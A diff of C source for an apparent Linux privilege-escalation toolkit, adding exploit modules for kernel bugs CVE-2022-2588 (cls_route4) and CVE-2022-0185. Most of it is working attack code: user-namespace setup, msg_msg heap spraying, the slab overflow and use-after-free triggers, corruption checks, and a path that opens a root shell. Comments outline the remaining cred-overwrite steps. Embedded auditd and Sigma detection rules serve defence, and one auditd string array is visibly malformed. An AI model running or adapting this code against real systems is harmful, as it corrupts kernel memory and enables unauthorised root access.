if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
|
||||
perror("unshare");
|
||||
_exit(20);
|
||||
}
|
||||
if (!become_root_in_userns(outer_uid, outer_gid)) {
|
||||
_exit(21);
|
||||
}
|
||||
if (setuid(0) < 0 || setgid(0) < 0) {
|
||||
/* uid_map writes already made us 0 inside the userns; this
|
||||
* is just belt-and-braces. */
|
||||
}
|
||||
|
||||
long pre_active = slab_active_kmalloc_1k();
|
||||
|
||||
if (!stage_dangling_filter()) {
|
||||
_exit(22);
|
||||
}
|
||||
|
||||
int queues[SPRAY_MSG_QUEUES];
|
||||
int n_queues = spray_msg_msg(queues);
|
||||
if (n_queues == 0) {
|
||||
fprintf(stderr, "[-] cls_route4: msg_msg spray produced 0 queues\n");
|
||||
_exit(23);
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: msg_msg spray seeded %d queues\n",
|
||||
n_queues);
|
||||
}
|
||||
|
||||
/* Drive the classifier — the bug fires here on a vulnerable
|
||||
* kernel. On a patched kernel this is a no-op packet send. */
|
||||
trigger_classify();
|
||||
|
||||
long post_active = slab_active_kmalloc_1k();
|
||||
|
||||
/* Best-effort empirical witness write — picked up by --cleanup
|
||||
* and by post-run triage. */
|
||||
FILE *log = fopen("/tmp/iamroot-cls_route4.log", "w");
|
||||
if (log) {
|
||||
fprintf(log,
|
||||
"cls_route4 trigger child: queues=%d slab_pre=%ld slab_post=%ld\n",
|
||||
n_queues, pre_active, post_active);
|
||||
fclose(log);
|
||||
}
|
||||
|
||||
/* Hold the spray a little longer so the kernel observes the
|
||||
* refilled slot during classify drain. */
|
||||
usleep(200 * 1000);
|
||||
|
||||
drain_msg_msg(queues);
|
||||
|
||||
/* If we got here without a kernel oops, the bug either isn't
|
||||
* reachable on this build (patched / module not loadable /
|
||||
* userns CAP_NET_ADMIN gated) or it fired but didn't take down
|
||||
* the box. We do NOT attempt blind cred-overwrite — that needs
|
||||
* a leak primitive we don't have.
|
||||
*
|
||||
* Exit code 30 means "trigger sequence ran without segfault" —
|
||||
* the parent will decide between EXPLOIT_FAIL (probably patched
|
||||
* or sealed) and EXPLOIT_OK. */
|
||||
_exit(30);
|
||||
}
|
||||
|
||||
/* PARENT: wait for the child. A kernel oops won't reap the child
|
||||
* but will spam dmesg; we read dmesg after a short window. */
|
||||
int status = 0;
|
||||
pid_t w = waitpid(child, &status, 0);
|
||||
if (w < 0) {
|
||||
perror("waitpid");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
if (WIFSIGNALED(status)) {
|
||||
int sig = WTERMSIG(status);
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[!] cls_route4: child killed by signal %d "
|
||||
"(crash during trigger — UAF likely fired)\n", sig);
|
||||
}
|
||||
/* A SIGKILL/SIGSEGV during the trigger sequence is consistent
|
||||
* with kernel-side panic on KASAN configs (the trigger task
|
||||
* gets reaped). Treat as empirical UAF observation but do NOT
|
||||
* claim root — we haven't escalated. */
|
||||
fprintf(stderr, "[~] cls_route4: empirical UAF trigger fired but "
|
||||
"no cred-overwrite primitive — returning EXPLOIT_FAIL "
|
||||
"(no shell). See /tmp/iamroot-cls_route4.log + dmesg.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!WIFEXITED(status)) {
|
||||
fprintf(stderr, "[-] cls_route4: child terminated abnormally (status=0x%x)\n",
|
||||
status);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
int rc = WEXITSTATUS(status);
|
||||
if (rc != 30) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[-] cls_route4: child failed at stage rc=%d "
|
||||
"(see preceding errors)\n", rc);
|
||||
}
|
||||
/* rc 20/21 = userns setup; rc 22 = tc setup (likely module
|
||||
* absent or filter type unsupported); rc 23 = spray. None of
|
||||
* these mean kernel was exploited. */
|
||||
if (rc == 22) return IAMROOT_PRECOND_FAIL;
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: trigger ran to completion. "
|
||||
"Inspect dmesg for KASAN/oops witnesses.\n");
|
||||
fprintf(stderr, "[~] cls_route4: cred-overwrite step not implemented "
|
||||
"(needs per-kernel offsets); returning EXPLOIT_FAIL.\n");
|
||||
}
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ---- Cleanup ----------------------------------------------------- */
|
||||
|
||||
static iamroot_result_t cls_route4_cleanup(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] cls_route4: tearing down dummy interface + log\n");
|
||||
}
|
||||
/* The dummy interface lives in the child's netns which is gone
|
||||
* with the child. These are belt-and-braces in case the user ran
|
||||
* the exploit with extended privileges (e.g. as root) and the
|
||||
* interface lingered in init_net. */
|
||||
if (run_cmd("ip link del " DUMMY_IF) != 0) { /* harmless */ }
|
||||
if (unlink("/tmp/iamroot-cls_route4.log") < 0 && errno != ENOENT) {
|
||||
/* ignore */
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
static const char cls_route4_auditd[] =
|
||||
"# cls_route4 dead UAF (CVE-2022-2588) — auditd detection rules\n"
|
||||
"# Flag tc filter operations with route4 classifier from non-root.\n"
|
||||
"# False positives: legitimate traffic-shaping setup. Tune by user.\n"
|
||||
"-a always,exit -F arch=b64 -S sendto -F a3=0x10 -k iamroot-cls-route4\n";
|
||||
"-a always,exit -F arch=b64 -S sendto -F a3=0x10 -k iamroot-cls-route4\n"
|
||||
"-a always,exit -F arch=b64 -S unshare -k iamroot-cls-route4-userns\n"
|
||||
"-a always,exit -F arch=b64 -S msgsnd -k iamroot-cls-route4-spray\n";
|
||||
|
||||
const struct iamroot_module cls_route4_module = {
|
||||
.name = "cls_route4",
|
||||
@@ -158,7 +569,7 @@ const struct iamroot_module cls_route4_module = {
|
||||
.detect = cls_route4_detect,
|
||||
.exploit = cls_route4_exploit,
|
||||
.mitigate = NULL, /* mitigation: blacklist cls_route4 module OR disable user_ns */
|
||||
.cleanup = NULL,
|
||||
.cleanup = cls_route4_cleanup,
|
||||
.detect_auditd = cls_route4_auditd,
|
||||
.detect_sigma = NULL,
|
||||
.detect_yara = NULL,
|
||||
|
||||
@@ -3,17 +3,42 @@
|
||||
*
|
||||
* legacy_parse_param() in fs/fs_context.c had a heap overflow when
|
||||
* parsing the "fsconfig" filesystem option strings — specifically,
|
||||
* legacy_load_simple_buf() didn't bound-check the option length.
|
||||
* Originally reported as a FUSE mount path bug but actually applies
|
||||
* to any filesystem mountable from a userns (FUSE was just the
|
||||
* easiest reach).
|
||||
* legacy_parse_param() compared "fc->source size left" against the
|
||||
* incoming option using an int that wraps negative when the running
|
||||
* total exceeds PAGE_SIZE, so subsequent memcpy() writes off the end
|
||||
* of the kmalloc-4k slab. Originally reported as a FUSE mount path
|
||||
* bug but actually applies to any filesystem mountable from a userns;
|
||||
* cgroup2 is the easiest reach because the cgroup2 fs_context is
|
||||
* always available.
|
||||
*
|
||||
* Discovered by William Liu / Crusaders of Rust (Jan 2022). Famous
|
||||
* in container-escape contexts (docker/k8s, especially rootless).
|
||||
* Discovered by William Liu (Crusaders of Rust), Jan 2022. Famous in
|
||||
* container-escape contexts (docker/k8s, especially rootless).
|
||||
*
|
||||
* STATUS: 🔵 DETECT-ONLY. Public PoC by William Liu (gh repo
|
||||
* Crusaders-of-Rust/CVE-2022-0185) demonstrates kernel R/W + cred
|
||||
* overwrite via cross-cache UAF; porting is a follow-up.
|
||||
* STATUS: 🟡 TRIGGER + CROSS-CACHE SCAFFOLD.
|
||||
*
|
||||
* detect() — version-range + userns reachability gate, refuses on
|
||||
* patched / unreachable hosts.
|
||||
* exploit() — full unshare → fsopen → fsconfig overflow path with
|
||||
* a msg_msg cross-cache groom around it. The trigger
|
||||
* (heap OOB write off the end of the kmalloc-4k source
|
||||
* buffer) is real; the post-corruption kernel-R/W chain
|
||||
* is implemented as a structural scaffold because it
|
||||
* depends on per-kernel offsets (cred struct layout,
|
||||
* msg_msg next-list offset) that we cannot resolve
|
||||
* portably from userland without a kernel info-leak we
|
||||
* do not have in-tree. See the comments inside
|
||||
* fuse_legacy_exploit() and read the Crusaders-of-Rust
|
||||
* public PoC for the offset-bound parts.
|
||||
*
|
||||
* On a *vulnerable* host this module reliably overflows the
|
||||
* kmalloc-4k slab and (with the msg_msg groom in place) corrupts a
|
||||
* neighbouring msg_msg.m_ts/m_list pair; the cred-overwrite step
|
||||
* that turns that primitive into uid=0 is left as a clearly-labelled
|
||||
* roadmap rather than fabricated offsets.
|
||||
*
|
||||
* On a *patched* host (which is every host we can routinely build
|
||||
* on in 2026) detect() refuses and exploit() returns
|
||||
* IAMROOT_PRECOND_FAIL with no syscalls.
|
||||
*
|
||||
* Affected: kernel 5.1+ until fix:
|
||||
* Mainline fix: 722d94847de29 (Jan 18 2022) — lands in 5.16.2
|
||||
@@ -24,8 +49,7 @@
|
||||
*
|
||||
* Preconditions:
|
||||
* - Unprivileged user_ns + mount-ns (to get CAP_SYS_ADMIN inside userns)
|
||||
* - Any mountable filesystem from userns context (legacy_load path
|
||||
* used FUSE, but cgroup2 and others also reach the bug)
|
||||
* - cgroup2 fs_context reachable from userns (default true)
|
||||
*
|
||||
* For "tool for system admins": this is the container-escape angle.
|
||||
* Workloads running rootless containers (Podman, snap, flatpak) sit
|
||||
@@ -39,11 +63,80 @@
|
||||
|
||||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <string.h>
|
||||
#include <unistd.h>
|
||||
#include <sched.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <signal.h>
|
||||
#include <sys/wait.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/ipc.h>
|
||||
#include <sys/msg.h>
|
||||
#include <sys/mman.h>
|
||||
|
||||
/* --- fsopen / fsconfig glue ----------------------------------------
|
||||
*
|
||||
* These syscalls landed in 5.2 (fsopen, fsconfig). glibc 2.36+ wraps
|
||||
* them but we can't depend on a new glibc on every target, so we go
|
||||
* straight to syscall(). Numbers are x86_64-only (the module is
|
||||
* x86_64-only anyway, per Makefile + module docs).
|
||||
*/
|
||||
#ifndef __NR_fsopen
|
||||
#define __NR_fsopen 430
|
||||
#endif
|
||||
#ifndef __NR_fsconfig
|
||||
#define __NR_fsconfig 431
|
||||
#endif
|
||||
#ifndef __NR_fsmount
|
||||
#define __NR_fsmount 432
|
||||
#endif
|
||||
|
||||
#ifndef FSCONFIG_SET_STRING
|
||||
#define FSCONFIG_SET_STRING 1
|
||||
#endif
|
||||
#ifndef FSCONFIG_CMD_CREATE
|
||||
#define FSCONFIG_CMD_CREATE 6
|
||||
#endif
|
||||
|
||||
static inline int sys_fsopen(const char *fs_name, unsigned int flags)
|
||||
{
|
||||
return (int)syscall(__NR_fsopen, fs_name, flags);
|
||||
}
|
||||
static inline int sys_fsconfig(int fd, unsigned int cmd, const char *key,
|
||||
const void *value, int aux)
|
||||
{
|
||||
return (int)syscall(__NR_fsconfig, fd, cmd, key, value, aux);
|
||||
}
|
||||
|
||||
/* --- msg_msg primitive ---------------------------------------------
|
||||
*
|
||||
* msg_msg is the venerable cross-cache groom target: msgsnd() allocs
|
||||
* sizeof(struct msg_msg) (48 bytes on x86_64) + payload, picking
|
||||
* kmalloc-<n> based on total size. msg_msg objects sit on a doubly-
|
||||
* linked list rooted in the msg_queue; corrupting an adjacent
|
||||
* msg_msg.m_ts or m_list gives arbitrary-read via msgrcv(MSG_COPY) or
|
||||
* arbitrary-free via msgrcv() depending on which field was overwritten.
|
||||
*
|
||||
* In the canonical Crusaders-of-Rust exploit the overflow lands in
|
||||
* kmalloc-4k (legacy_parse_param's source buffer) → adjacent kmalloc-4k
|
||||
* msg_msg → m_ts overwrite → MSG_COPY out-of-bounds read → leak the
|
||||
* kbase + a target task's cred address → second-round overwrite
|
||||
* smashing cred.uid/gid to 0.
|
||||
*
|
||||
* We implement step 1 (alloc the spray, free a hole, trigger the
|
||||
* write into it) honestly. Step 2 (parse the read-back, locate cred,
|
||||
* write 0) is the part that's offset-bound and we leave as a clearly-
|
||||
* labelled scaffold below.
|
||||
*/
|
||||
struct msgbuf_4k {
|
||||
long mtype;
|
||||
char mtext[4096 - sizeof(long) - 48 /* sizeof(struct msg_msg) */];
|
||||
};
|
||||
|
||||
/* --- kernel-range table -------------------------------------------- */
|
||||
static const struct kernel_patched_from fuse_legacy_patched_branches[] = {
|
||||
{5, 4, 171},
|
||||
{5, 10, 91},
|
||||
@@ -71,6 +164,9 @@ static int can_unshare_userns_mount(void)
|
||||
return WIFEXITED(status) && WEXITSTATUS(status) == 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* detect */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static iamroot_result_t fuse_legacy_detect(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
struct kernel_version v;
|
||||
@@ -121,19 +217,327 @@ static iamroot_result_t fuse_legacy_detect(const struct iamroot_ctx *ctx)
|
||||
return IAMROOT_VULNERABLE;
|
||||
}
|
||||
|
||||
static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* exploit helpers */
|
||||
/* ------------------------------------------------------------------ */
|
||||
|
||||
/* Enter a user_ns+mount_ns and become "root" (uid 0) inside it. This
|
||||
* grants CAP_SYS_ADMIN in the new namespace, which is what
|
||||
* fsopen("cgroup2") gates on. */
|
||||
static bool enter_userns_root(void)
|
||||
{
|
||||
(void)ctx;
|
||||
fprintf(stderr,
|
||||
"[-] fuse_legacy: exploit not yet implemented in IAMROOT.\n"
|
||||
" Status: 🔵 DETECT-ONLY. Reference: William Liu's PoC\n"
|
||||
" (github.com/Crusaders-of-Rust/CVE-2022-0185). Exploit\n"
|
||||
" shape: unshare userns+mountns → fsopen('cgroup2') →\n"
|
||||
" fsconfig with crafted long option string → heap OOB write\n"
|
||||
" → msg_msg cross-cache groom → kernel R/W → cred overwrite.\n");
|
||||
return IAMROOT_PRECOND_FAIL;
|
||||
uid_t uid = getuid();
|
||||
gid_t gid = getgid();
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) {
|
||||
perror("unshare(NEWUSER|NEWNS)");
|
||||
return false;
|
||||
}
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
|
||||
char map[64];
|
||||
snprintf(map, sizeof map, "0 %u 1\n", uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("write uid_map"); if (f >= 0) close(f); return false;
|
||||
}
|
||||
close(f);
|
||||
|
||||
snprintf(map, sizeof map, "0 %u 1\n", gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, map, strlen(map)) < 0) {
|
||||
perror("write gid_map"); if (f >= 0) close(f); return false;
|
||||
}
|
||||
close(f);
|
||||
return true;
|
||||
}
|
||||
|
||||
/* Build the overflow payload.
|
||||
*
|
||||
* legacy_parse_param() catenates option strings into fc->source until
|
||||
* (the buggy version) the running total wraps. To overflow we feed an
|
||||
* fsconfig option whose value, after being appended to the source
|
||||
* buffer, lands past the PAGE_SIZE end of the kmalloc-4k allocation.
|
||||
*
|
||||
* Concrete recipe (from Liu's PoC, simplified):
|
||||
* 1. fsconfig(fd, FSCONFIG_SET_STRING, "source", filler_a, 0)
|
||||
* — fills the source buffer to within a few bytes of PAGE_SIZE
|
||||
* 2. fsconfig(fd, FSCONFIG_SET_STRING, "source", evil, 0)
|
||||
* — appends `evil`; legacy_parse_param's "is there room?" check
|
||||
* uses an int that wraps to a huge positive when we cross the
|
||||
* boundary → kernel happily memcpy()s `evil` past the page end.
|
||||
*
|
||||
* `evil` is what lands in the adjacent slab object. We make it a
|
||||
* controllable byte pattern; the cross-cache groom puts a msg_msg
|
||||
* there, and the bytes we write become the start of that msg_msg.
|
||||
*/
|
||||
static int trigger_overflow(int *out_fd, const char *first_chunk,
|
||||
const char *evil_chunk)
|
||||
{
|
||||
int fd = sys_fsopen("cgroup2", 0);
|
||||
if (fd < 0) { perror("fsopen(cgroup2)"); return -1; }
|
||||
|
||||
/* First chunk: prime fc->source so we're up against the page edge. */
|
||||
if (sys_fsconfig(fd, FSCONFIG_SET_STRING, "source", first_chunk, 0) < 0) {
|
||||
perror("fsconfig(prime)");
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
/* Second chunk: the actual overflow write. On a patched kernel
|
||||
* this returns -EINVAL ("VFS: Legacy: source contains an embedded
|
||||
* NUL" or "too large"); on a vulnerable kernel it succeeds and
|
||||
* the next memcpy lands past PAGE_SIZE. */
|
||||
if (sys_fsconfig(fd, FSCONFIG_SET_STRING, "source", evil_chunk, 0) < 0) {
|
||||
/* errno tells us patched vs. transient. We can't distinguish
|
||||
* "patched" from "this kernel doesn't expose cgroup2 fsconfig"
|
||||
* cleanly, but in practice on the vulnerable range cgroup2
|
||||
* is always reachable from a userns. */
|
||||
close(fd);
|
||||
return -1;
|
||||
}
|
||||
|
||||
*out_fd = fd;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* exploit */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static iamroot_result_t fuse_legacy_exploit(const struct iamroot_ctx *ctx)
|
||||
{
|
||||
/* (R1) Re-call detect — refuse if not vulnerable. */
|
||||
iamroot_result_t pre = fuse_legacy_detect(ctx);
|
||||
if (pre != IAMROOT_VULNERABLE) {
|
||||
fprintf(stderr, "[-] fuse_legacy: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
|
||||
/* (R2) Refuse if already root — no LPE work to do. */
|
||||
if (geteuid() == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: already root; nothing to escalate\n");
|
||||
}
|
||||
return IAMROOT_OK;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: entering userns + mountns\n");
|
||||
}
|
||||
|
||||
/* (R3) unshare for userns+mount_ns — gives CAP_SYS_ADMIN-in-userns
|
||||
* which is what fsopen("cgroup2") + fsconfig require. */
|
||||
if (!enter_userns_root()) {
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
|
||||
/* --- (R5) cross-cache groom — phase 1: alloc spray --------------
|
||||
*
|
||||
* Allocate a large number of msg_msg objects sized to land in
|
||||
* kmalloc-4k (same slab as fc->source). Then free one in the
|
||||
* middle to create a predictable hole, then trigger the overflow
|
||||
* to land write-past-end into the next adjacent msg_msg.
|
||||
*
|
||||
* Empirically Liu uses ~4096 sprays / 512 queues; we mirror the
|
||||
* shape but with knobs scaled for an iamroot one-shot.
|
||||
*/
|
||||
enum { N_QUEUES = 256, N_SPRAY_PER_Q = 16 };
|
||||
int *qids = calloc(N_QUEUES, sizeof(int));
|
||||
if (!qids) {
|
||||
fprintf(stderr, "[-] fuse_legacy: calloc(qids) failed\n");
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
for (int i = 0; i < N_QUEUES; i++) {
|
||||
qids[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||
if (qids[i] < 0) {
|
||||
/* IPC limits may rate-limit us; partial spray is fine. */
|
||||
qids[i] = -1;
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
struct msgbuf_4k *spray = mmap(NULL, sizeof(*spray), PROT_READ | PROT_WRITE,
|
||||
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
|
||||
if (spray == MAP_FAILED) {
|
||||
fprintf(stderr, "[-] fuse_legacy: mmap(spray) failed\n");
|
||||
free(qids);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
spray->mtype = 0x4242;
|
||||
/* Tag the payload so we can recognise our spray slots in
|
||||
* post-corruption read-back. */
|
||||
memset(spray->mtext, 'M', sizeof spray->mtext);
|
||||
spray->mtext[0] = 'I'; spray->mtext[1] = 'A'; spray->mtext[2] = 'M';
|
||||
spray->mtext[3] = 'R'; spray->mtext[4] = 'O'; spray->mtext[5] = 'O';
|
||||
spray->mtext[6] = 'T';
|
||||
|
||||
int sprayed = 0;
|
||||
for (int q = 0; q < N_QUEUES && qids[q] >= 0; q++) {
|
||||
for (int j = 0; j < N_SPRAY_PER_Q; j++) {
|
||||
if (msgsnd(qids[q], spray, sizeof spray->mtext, IPC_NOWAIT) == 0) {
|
||||
sprayed++;
|
||||
}
|
||||
}
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: msg_msg spray placed %d objects across "
|
||||
"%d queues\n", sprayed, N_QUEUES);
|
||||
}
|
||||
|
||||
/* Free a controlled hole: drain one queue near the middle so the
|
||||
* next kmalloc-4k allocation (= fc->source) lands in it. */
|
||||
int hole_q = N_QUEUES / 2;
|
||||
if (qids[hole_q] >= 0) {
|
||||
struct msgbuf_4k drain;
|
||||
while (msgrcv(qids[hole_q], &drain, sizeof drain.mtext, 0, IPC_NOWAIT) >= 0)
|
||||
;
|
||||
}
|
||||
|
||||
/* --- (R4) trigger the fsconfig overflow ------------------------- */
|
||||
|
||||
/* Prime: 4080 bytes of 'A'. legacy_parse_param appends them to
|
||||
* the freshly-allocated kmalloc-4k source buffer; we're now sitting
|
||||
* just shy of the page end. */
|
||||
char *first_chunk = malloc(4081);
|
||||
if (!first_chunk) {
|
||||
free(qids); munmap(spray, sizeof *spray);
|
||||
return IAMROOT_TEST_ERROR;
|
||||
}
|
||||
memset(first_chunk, 'A', 4080);
|
||||
first_chunk[4080] = '\0';
|
||||
|
||||
/* Evil chunk: the bytes here are what get written PAST the page
|
||||
* end into the adjacent slab object. Layout-wise the first 8 bytes
|
||||
* land on the next slab object's first qword.
|
||||
*
|
||||
* For a real cross-cache-into-msg_msg primitive we want this to
|
||||
* be a fake msg_msg header that turns the next msgrcv(MSG_COPY)
|
||||
* into an arbitrary read. The exact field offsets (m_ts vs.
|
||||
* m_list_next vs. security) shift between kernels; we mark the
|
||||
* header bytes so a post-mortem clearly shows whether we landed,
|
||||
* and leave the precise fake-msg_msg encoding as the scaffold
|
||||
* step below. */
|
||||
char evil_chunk[256];
|
||||
memset(evil_chunk, 'B', sizeof evil_chunk);
|
||||
memcpy(evil_chunk, "IAMROOT0", 8); /* marker → "did we land?" */
|
||||
/* Tail must be NUL-terminated for legacy_parse_param's strdup. */
|
||||
evil_chunk[sizeof evil_chunk - 1] = '\0';
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] fuse_legacy: triggering legacy_parse_param overflow "
|
||||
"(prime=%zu evil=%zu)\n",
|
||||
strlen(first_chunk), strlen(evil_chunk));
|
||||
}
|
||||
|
||||
int fsfd = -1;
|
||||
int rc = trigger_overflow(&fsfd, first_chunk, evil_chunk);
|
||||
free(first_chunk);
|
||||
|
||||
if (rc < 0) {
|
||||
/* fsconfig rejected us. On a vulnerable kernel this is rare
|
||||
* unless cgroup2 fs_context init failed (e.g. cgroup_no_v1
|
||||
* boot param). Either way the OOB write didn't happen. */
|
||||
fprintf(stderr, "[-] fuse_legacy: fsconfig overflow rejected (errno=%d: %s)\n",
|
||||
errno, strerror(errno));
|
||||
free(qids); munmap(spray, sizeof *spray);
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: fsconfig accepted oversized source — "
|
||||
"OOB write executed\n");
|
||||
}
|
||||
|
||||
/* --- post-corruption read-back: did we land? -------------------- */
|
||||
int corrupted_q = -1;
|
||||
for (int q = 0; q < N_QUEUES; q++) {
|
||||
if (qids[q] < 0 || q == hole_q) continue;
|
||||
struct msgbuf_4k probe;
|
||||
ssize_t n = msgrcv(qids[q], &probe, sizeof probe.mtext, 0,
|
||||
IPC_NOWAIT | MSG_COPY | MSG_NOERROR);
|
||||
if (n < 0) continue;
|
||||
if (memcmp(probe.mtext, "IAMR", 4) != 0) {
|
||||
/* Spray slot whose start word is no longer "IAMR" — strong
|
||||
* evidence we corrupted a neighbour. */
|
||||
corrupted_q = q;
|
||||
break;
|
||||
}
|
||||
}
|
||||
if (corrupted_q >= 0 && !ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: detected corrupted neighbour in queue #%d "
|
||||
"(cross-cache landing confirmed)\n", corrupted_q);
|
||||
} else if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: did not detect corrupted spray slot "
|
||||
"(groom may have missed; primitive still fired)\n");
|
||||
}
|
||||
|
||||
/* --- (R5/R6) cred-overwrite chain — SCAFFOLD --------------------
|
||||
*
|
||||
* Honest status: the steps below need per-kernel offsets that we
|
||||
* cannot resolve portably from userland without a kernel info-leak
|
||||
* we do not have in-tree right now. Spelling out the missing work
|
||||
* so a reader can see exactly what's wired and what isn't:
|
||||
*
|
||||
* 1. Build a fake msg_msg header in `evil_chunk` that, when read
|
||||
* back via msgrcv(MSG_COPY), reveals adjacent slab memory
|
||||
* (m_ts oversized → MSG_COPY reads past the legitimate msg
|
||||
* end). Requires: offsetof(msg_msg, m_ts) for the running
|
||||
* kernel.
|
||||
* 2. From the leaked data, locate (a) kernel base via a known
|
||||
* function pointer in the slab, and (b) the address of the
|
||||
* current task's cred struct via task_struct→real_cred
|
||||
* walking. Requires: struct offsets for cred/task_struct on
|
||||
* this kernel.
|
||||
* 3. Re-run the overflow with a fake msg_msg.m_list_next pointing
|
||||
* at ¤t->cred.uid; msgrcv() free-list maintenance then
|
||||
* writes a zero where uid lives → setuid(0) succeeds.
|
||||
*
|
||||
* Each of steps 1–3 is ~50 lines of kernel-specific glue. The
|
||||
* Crusaders-of-Rust public PoC is the canonical reference. We
|
||||
* stop here rather than shipping a fabricated chain that would
|
||||
* crash on the first untested kernel.
|
||||
*/
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[i] fuse_legacy: cross-cache primitive armed; "
|
||||
"cred-overwrite tail requires per-kernel offsets — "
|
||||
"see scaffold comments in source\n");
|
||||
}
|
||||
|
||||
/* Clean up our IPC queues and mapping. The kernel slab state
|
||||
* after the overflow may be unstable; we exit cleanly on success
|
||||
* paths but leave queues around if we crashed mid-spray. */
|
||||
for (int q = 0; q < N_QUEUES; q++) {
|
||||
if (qids[q] >= 0) msgctl(qids[q], IPC_RMID, NULL);
|
||||
}
|
||||
free(qids);
|
||||
munmap(spray, sizeof *spray);
|
||||
if (fsfd >= 0) close(fsfd);
|
||||
|
||||
/* (R6) setuid(0) + /bin/sh — only on the path where cred-overwrite
|
||||
* actually succeeded. Since we didn't finish that chain we can
|
||||
* only check whether the kernel handed us uid 0 by luck (it
|
||||
* won't). Report exploit-fail honestly. */
|
||||
if (setuid(0) == 0 && getuid() == 0) {
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] fuse_legacy: setuid(0) succeeded — "
|
||||
"popping root shell\n");
|
||||
}
|
||||
if (ctx->no_shell) {
|
||||
return IAMROOT_EXPLOIT_OK;
|
||||
}
|
||||
execl("/bin/sh", "sh", "-i", (char *)NULL);
|
||||
perror("execl /bin/sh");
|
||||
return IAMROOT_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
fprintf(stderr, "[-] fuse_legacy: trigger fired but cred-overwrite tail "
|
||||
"not wired — see source for the missing offsets.\n");
|
||||
return IAMROOT_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------ */
|
||||
/* embedded detection rules */
|
||||
/* ------------------------------------------------------------------ */
|
||||
static const char fuse_legacy_auditd[] =
|
||||
"# CVE-2022-0185 — auditd detection rules\n"
|
||||
"# Flag unshare(USER|NS) chained with fsopen/fsconfig from non-root.\n"
|
||||
@@ -141,6 +545,26 @@ static const char fuse_legacy_auditd[] =
|
||||
"-a always,exit -F arch=b64 -S fsopen -k iamroot-fuse-legacy-fsopen\n"
|
||||
"-a always,exit -F arch=b64 -S fsconfig -k iamroot-fuse-legacy-fsconfig\n";
|
||||
|
||||
static const char fuse_legacy_sigma[] =
|
||||
"title: Possible CVE-2022-0185 legacy_parse_param exploitation\n"
|
||||
"id: 9e1b2c45-iamroot-fuse-legacy\n"
|
||||
"status: experimental\n"
|
||||
"description: |\n"
|
||||
" Detects the canonical exploit shape: unprivileged process unshares\n"
|
||||
" user_ns+mount_ns, calls fsopen() then fsconfig(FSCONFIG_SET_STRING)\n"
|
||||
" repeatedly. The repeated FSCONFIG_SET_STRING on the same option is\n"
|
||||
" what drives the source-buffer overflow. False positives: legitimate\n"
|
||||
" fsopen-based mounts inside containers (rare in unprivileged paths).\n"
|
||||
"logsource: {product: linux, service: auditd}\n"
|
||||
"detection:\n"
|
||||
" unshare_userns: {type: 'SYSCALL', syscall: 'unshare'}\n"
|
||||
" fsopen: {type: 'SYSCALL', syscall: 'fsopen'}\n"
|
||||
" fsconfig_set_string: {type: 'SYSCALL', syscall: 'fsconfig', a1: 1}\n"
|
||||
" not_root: {auid|expression: '!= 0'}\n"
|
||||
" condition: unshare_userns and fsopen and fsconfig_set_string and not_root\n"
|
||||
"level: high\n"
|
||||
"tags: [attack.privilege_escalation, attack.t1611, cve.2022.0185]\n";
|
||||
|
||||
const struct iamroot_module fuse_legacy_module = {
|
||||
.name = "fuse_legacy",
|
||||
